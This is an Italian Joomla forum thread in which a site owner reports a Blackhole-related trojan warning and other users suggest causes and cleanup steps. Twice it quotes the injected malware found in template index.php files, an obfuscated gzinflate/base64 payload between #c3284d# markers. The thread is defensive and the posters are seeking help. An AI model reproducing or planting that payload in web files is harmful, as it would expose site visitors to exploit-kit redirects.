URGENTE Joomla 1.5.26 Trojan:JS/BlacoleRef.W

[negiot]

Ciao, ho trovato il mio sito collassato... ie mi segnalava :

• ...\Content.IE5\30UKLEEX\jquerymini[1].js
• Microsoft Malware Protection Center segnalava Trojan:JS/BlacoleRef.W

Ho trovato nella webroot del sito

il file /tmp/jquerymini.js   e nel nel file /templates/rt_terrantribune_j15/index.php  o index del vostro template, troverete il seguente codice:

Codice: [Seleziona]

#c3284d#
echo(gzinflate(base64_decode("TcxbCsMgEEbhrYjvKuQCpSTZy0QkGVFjM7+l2X0Leenrd+BM4k+uULhqmDXCBy7Sm27VKlHZGm2/9K9y+lnvQH06tx+CfjDd2BkBgb0devMYzWrXJlyCiEVIwR+ZQYnJMhxydfHVwnllLmyjaLVM7r4vXw==")));
#/c3284d#

Eliminate file e codice... qualcuno conosce il FIX ? grazie ngt

[vamba]

Il problema non è joomla ma risiede nel template.

Dato che il template è commerciale ti consiglierei di contattare il template Club dove hai l'iscrizione in quanto pagando l'iscrizione stessa hai pure il supporto.

Però .... dato che molti template commerciali si trovano in download nei canali warez ci terrei a specificare che l'utilizzo senza essere iscritti per prima cosa non è contemplato dalla licenza e seconda cosa, spesso, i template che gravitano nei canali warez sono strapieni di backdoor e ammennioli vari.

[negiot]

cmq il template nn e' warez.

[vamba]

cmq il template nn e' warez.

Ottimo ... allora contatta il Template Club per segnalare che distribuiscono a pagamento un template che potrebbe avere seri problemi di sicurezza e richiedi ugentemente assistenza dato che paghi, oltre al template in se, anche per l'assistenza post vendita.

[negiot]

ok grazie

[negiot]

ehmmm ho trovato

in /template/system/index.php

il seguente codice:

Codice: [Seleziona]

<?php
include dirname(__FILE__).DIRECTORY_SEPARATOR.'component.php';

#c3284d#
echo(gzinflate(base64_decode("TcxbCsMgEEbhrYjvKuQCpSTZy0QkGVFjM7+l2X0Leenrd+BM4k+uULhqmDXCBy7Sm27VKlHZGm2/9K9y+lnvQH06tx+CfjDd2BkBgb0devMYzWrXJlyCiEVIwR+ZQYnJMhxydfHVwnllLmyjaLVM7r4vXw==")));
#/c3284d#
?>
tutti gli index.php di tutti template anche quelli standard sono infetti...

[negiot]

penso che il bug sia legato a com_gcalendar...

[Npaquito]

Hola

In questo forum non si fornisce supporto a estensioni commerciali

[vamba]

tutti gli index.php di tutti template anche quelli standard sono infetti...

Controlla tutte le estensioni che hai aggiunto, escludendo quelle di default di joomla, e verifica che siano aggiornate all'ultima versione.
L'inclusione del codice in tutti i file index avviene propio a causa di una falla di sicurezza e per scoprire quale sia la causa si deve necessariamente capire quali siano le estensioni aggiunte.

In partticolari casi, però, può accadere che il veicoco che permette di caricare software malevolo simo proprio noi, o meglio il nostro pc quindi è sempre meglio scansionare il nostro computer prima di caricare qualcosa sia via ftp che con caricamento normale.